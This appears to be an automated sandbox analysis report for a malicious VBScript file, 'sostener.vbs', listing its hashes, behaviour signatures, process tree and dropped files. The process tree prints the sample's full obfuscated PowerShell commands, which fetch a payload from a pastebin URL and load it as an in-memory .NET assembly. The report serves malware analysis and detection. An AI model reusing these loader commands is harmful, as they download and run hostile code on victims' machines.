Analysis

  • max time kernel
    122s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    07-06-2024 09:16

General

  • Target

    sostener.vbs

  • Size

    1.8MB

  • MD5

    f7d37d2cef66cbbefcc48668c18a1fb1

  • SHA1

    cb1dd42e8ce1298c61abdd6ee7c33e506b716aed

  • SHA256

    ee70bac37164bfea88a53013f439328eece11c224dc4f7f09f79fba14a817175

  • SHA512

    18977a9485aa4412db236ee0d2e69fafa9a0725d610a245e9a0cfeabbccbc554fb9d7e98d2a528911ed661eb78e99ea760cb5b328fa825fb478851b136c74fbc

  • SSDEEP

    768:ufdk9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9E9S:ufdy

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://pastebin.com/raw/V9y5Q5vv

Signatures

  • Blocklisted process makes network request 6 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sostener.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3040
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $MkplqW = 'J☼Bi☼GI☼cwBl☼HM☼I☼☼9☼C☼☼Jw☼w☼Cc☼Ow☼k☼Go☼e☼Bt☼Go☼ag☼g☼D0☼I☼☼n☼CU☼c☼B6☼EE☼YwBP☼Gc☼SQBu☼E0☼cg☼l☼Cc☼OwBb☼EI☼eQB0☼GU☼WwBd☼F0☼I☼☼k☼G8☼awBk☼Hk☼dg☼g☼D0☼I☼Bb☼HM☼eQBz☼HQ☼ZQBt☼C4☼QwBv☼G4☼dgBl☼HI☼d☼Bd☼Do☼OgBG☼HI☼bwBt☼EI☼YQBz☼GU☼Ng☼0☼FM☼d☼By☼Gk☼bgBn☼Cg☼I☼☼o☼E4☼ZQB3☼C0☼TwBi☼Go☼ZQBj☼HQ☼I☼BO☼GU☼d☼☼u☼Fc☼ZQBi☼EM☼b☼Bp☼GU☼bgB0☼Ck☼LgBE☼G8☼dwBu☼Gw☼bwBh☼GQ☼UwB0☼HI☼aQBu☼Gc☼K☼☼g☼Cg☼TgBl☼Hc☼LQBP☼GI☼agBl☼GM☼d☼☼g☼E4☼ZQB0☼C4☼VwBl☼GI☼QwBs☼Gk☼ZQBu☼HQ☼KQ☼u☼EQ☼bwB3☼G4☼b☼Bv☼GE☼Z☼BT☼HQ☼cgBp☼G4☼Zw☼o☼Cc☼a☼B0☼HQ☼c☼Bz☼Do☼Lw☼v☼H☼☼YQBz☼HQ☼ZQBi☼Gk☼bg☼u☼GM☼bwBt☼C8☼cgBh☼Hc☼LwBW☼Dk☼eQ☼1☼FE☼NQB2☼HY☼Jw☼p☼C☼☼KQ☼g☼Ck☼OwBb☼HM☼eQBz☼HQ☼ZQBt☼C4☼QQBw☼H☼☼R☼Bv☼G0☼YQBp☼G4☼XQ☼6☼Do☼QwB1☼HI☼cgBl☼G4☼d☼BE☼G8☼bQBh☼Gk☼bg☼u☼Ew☼bwBh☼GQ☼K☼☼k☼G8☼awBk☼Hk☼dg☼p☼C4☼RwBl☼HQ☼V☼B5☼H☼☼ZQ☼o☼Cc☼QwBs☼GE☼cwBz☼Ew☼aQBi☼HI☼YQBy☼Hk☼Mw☼u☼EM☼b☼Bh☼HM☼cw☼x☼Cc☼KQ☼u☼Ec☼ZQB0☼E0☼ZQB0☼Gg☼bwBk☼Cg☼JwBN☼HM☼cQBC☼Ek☼YgBZ☼Cc☼KQ☼u☼Ek☼bgB2☼G8☼awBl☼Cg☼J☼Bu☼HU☼b☼Bs☼Cw☼I☼Bb☼G8☼YgBq☼GU☼YwB0☼Fs☼XQBd☼C☼☼K☼☼n☼D☼☼LwBX☼Ho☼O☼BG☼Gg☼LwBk☼C8☼ZQBl☼C4☼ZQB0☼HM☼YQBw☼C8☼Lw☼6☼HM☼c☼B0☼HQ☼a☼☼n☼C☼☼L☼☼g☼CQ☼agB4☼G0☼agBq☼C☼☼L☼☼g☼Cc☼XwBf☼F8☼XwBf☼F8☼d☼By☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼Xw☼t☼C0☼LQ☼t☼C0☼LQ☼t☼Cc☼L☼☼g☼CQ☼YgBi☼HM☼ZQBz☼Cw☼I☼☼n☼DE☼Jw☼s☼C☼☼JwBS☼G8☼Z☼Bh☼Cc☼I☼☼p☼Ck☼Ow☼=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $MkplqW.replace('☼','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\sostener.vbs');powershell -command $KByHL;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1152
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$bbses = '0';$jxmjj = 'C:\Users\Admin\AppData\Local\Temp\sostener.vbs';[Byte[]] $okdyv = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($okdyv).GetType('ClassLibrary3.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/Wz8Fh/d/ee.etsap//:sptth' , $jxmjj , '______tr______________________________________-------', $bbses, '1', 'Roda' ));"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2020

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

    Filesize

    1KB

    MD5

    a266bb7dcc38a562631361bbf61dd11b

    SHA1

    3b1efd3a66ea28b16697394703a72ca340a05bd5

    SHA256

    df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

    SHA512

    0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    be180dd24ed900738b2bf16d93a292f9

    SHA1

    79112e161485bd57185a7bcfd4fb68db21ef33dc

    SHA256

    226c291914d6713bf671b7a161386b4792227dc10a16cb171889a142ce9da774

    SHA512

    d8ab26f216926c7e14866b7d257acaf6789947acafb14a46465abb58ce6fba1be3e79d1b7e8671433769410a226679be83e02dfae9ff653a780bc6499a9c4686

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    84607de4e5b5ded14969b88597866120

    SHA1

    3ac0002f9e97fa271fa05993def31977913d000b

    SHA256

    db5a9d88ccddf5cb623b9a666753c5249d8f1fd4c7ef0adba919c37c1bce704f

    SHA512

    3af5080ba150cd16e347dfb4f0f00440df87f2b4b215ef2f8211198bb3df30789d6ab161e961072c17a81e13a7b1a564a02dfc71fd8729f912d7502d22699401

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

    Filesize

    242B

    MD5

    0195d2df21e85f68711c6fba06289c73

    SHA1

    6596b5d55689fdbf4075510ef3f445cb1ea80289

    SHA256

    7950d7ebacb4f26bdb35eb7734491a88d4a4bad01afb8bd58054035eb6fd18ad

    SHA512

    fa9d9adcdff7ebb39d7349c3e864823a77ab583e0d314d5845ce903ac2564af41dbed40f6904d72dec82b2cf55ea8f95716125770dd0488d935d03bed84dc610

  • C:\Users\Admin\AppData\Local\Temp\Tar37D7.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GL60VJ2HV52X63VBYMUI.temp

    Filesize

    7KB

    MD5

    0476aa33e3271d6304ac3501af19eaa5

    SHA1

    13bbf61c861d3e6742e6f5754aaf7d1ac12af4a8

    SHA256

    eaab4e9278d73d266a88d6fef1a10340b24922c6b1fcd2c4322095c5d7fa91ee

    SHA512

    02b84e9d24211212c889230a8b2e96201c565c5983c2f93f3a34c7bf761e4c743a2f5fe0b5f6e6d9c1de4d8f43224f4f4a66a17ef9775ca85a743b8c39538e8b

  • memory/1152-11-0x000007FEF5EE0000-0x000007FEF687D000-memory.dmp

    Filesize

    9.6MB

  • memory/1152-4-0x000007FEF619E000-0x000007FEF619F000-memory.dmp

    Filesize

    4KB

  • memory/1152-10-0x000007FEF5EE0000-0x000007FEF687D000-memory.dmp

    Filesize

    9.6MB

  • memory/1152-9-0x000007FEF5EE0000-0x000007FEF687D000-memory.dmp

    Filesize

    9.6MB

  • memory/1152-8-0x000007FEF5EE0000-0x000007FEF687D000-memory.dmp

    Filesize

    9.6MB

  • memory/1152-7-0x000007FEF5EE0000-0x000007FEF687D000-memory.dmp

    Filesize

    9.6MB

  • memory/1152-6-0x0000000001D80000-0x0000000001D88000-memory.dmp

    Filesize

    32KB

  • memory/1152-5-0x000000001B720000-0x000000001BA02000-memory.dmp

    Filesize

    2.9MB

  • memory/1152-117-0x000007FEF5EE0000-0x000007FEF687D000-memory.dmp

    Filesize

    9.6MB

  • memory/2020-116-0x000000001BC20000-0x000000001BC2A000-memory.dmp

    Filesize

    40KB